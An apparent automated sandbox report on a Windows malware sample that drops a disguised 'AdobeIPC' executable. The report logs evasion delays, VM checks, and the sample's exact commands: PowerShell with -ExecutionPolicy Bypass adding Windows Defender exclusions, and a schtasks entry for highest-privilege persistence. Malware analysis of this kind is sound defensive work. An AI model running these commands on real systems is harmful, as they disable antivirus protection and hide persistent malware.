Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Memory allocated: 1AA00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Memory allocated: 1420000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Memory allocated: 2BE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Memory allocated: 4BE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Memory allocated: 1040000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Memory allocated: 1ACE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\AdobeIPC	Memory allocated: 1150000 memory reserve \| memory write watch
Source: C:\ProgramData\AdobeIPC	Memory allocated: 1AD70000 memory reserve \| memory write watch
Source: C:\ProgramData\AdobeIPC.exe	Memory allocated: 800000 memory reserve \| memory write watch
Source: C:\ProgramData\AdobeIPC.exe	Memory allocated: 1A350000 memory reserve \| memory write watch
Source: C:\ProgramData\AdobeIPC.exe	Memory allocated: 10B0000 memory reserve \| memory write watch
Source: C:\ProgramData\AdobeIPC.exe	Memory allocated: 1ACD0000 memory reserve \| memory write watch
Source: C:\ProgramData\AdobeIPC	Memory allocated: C80000 memory reserve \| memory write watch
Source: C:\ProgramData\AdobeIPC	Memory allocated: 1AAC0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\AdobeIPC	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\AdobeIPC.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\AdobeIPC.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\AdobeIPC	Thread delayed: delay time: 922337203685477

Source: C:\ProgramData\AdobeIPC.exe	Window / User API: threadDelayed 5147	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Window / User API: threadDelayed 4626	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6519	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3114	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7996	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1573	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6067
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3559
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7641
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2042

Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe

Dropped PE file which has not been started: C:\ProgramData\Guna.UI2.dll

Jump to dropped file

Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe TID: 7308	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe TID: 7644	Thread sleep time: -35971150943733603s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7748	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7972	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4600	Thread sleep count: 6067 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4600	Thread sleep count: 3559 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 432	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6412	Thread sleep count: 7641 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6964	Thread sleep count: 2042 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7296	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\ProgramData\AdobeIPC TID: 7880	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\AdobeIPC.exe TID: 3332	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\AdobeIPC.exe TID: 824	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\AdobeIPC TID: 7924	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\ProgramData\AdobeIPC.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\ProgramData\AdobeIPC	File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\AdobeIPC.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\AdobeIPC.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\AdobeIPC	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\AdobeIPC	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\AdobeIPC.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\AdobeIPC.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\AdobeIPC	Thread delayed: delay time: 922337203685477

Source: AdobeIPC.exe, 00000002.00000002.3026731845.000000001B8C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"0
Source: AdobeIPC.exe, 00000002.00000002.2956849178.0000000001122000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\ProgramData\AdobeIPC.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\ProgramData\AdobeIPC.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\ProgramData\AdobeIPC	Process token adjusted: Debug
Source: C:\ProgramData\AdobeIPC	Process token adjusted: Debug

Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\ProgramData\AdobeIPC.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\AdobeIPC.exe'
Source: C:\ProgramData\AdobeIPC.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\AdobeIPC'
Source: C:\ProgramData\AdobeIPC.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\AdobeIPC.exe'	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\AdobeIPC'	Jump to behavior

Bypasses PowerShell execution policy

Source: C:\ProgramData\AdobeIPC.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\AdobeIPC.exe'

Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Process created: C:\ProgramData\Stellar Generator.exe "C:\ProgramData\Stellar Generator.exe"	Jump to behavior
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Process created: C:\ProgramData\AdobeIPC.exe "C:\ProgramData\AdobeIPC.exe"	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\AdobeIPC.exe'	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AdobeIPC.exe'	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\AdobeIPC'	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AdobeIPC'	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "AdobeIPC" /tr "C:\ProgramData\AdobeIPC"	Jump to behavior

Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Queries volume information: C:\Users\user\Desktop\jcMcDQ11pZ.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\ProgramData\Stellar Generator.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\ProgramData\Guna.UI2.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
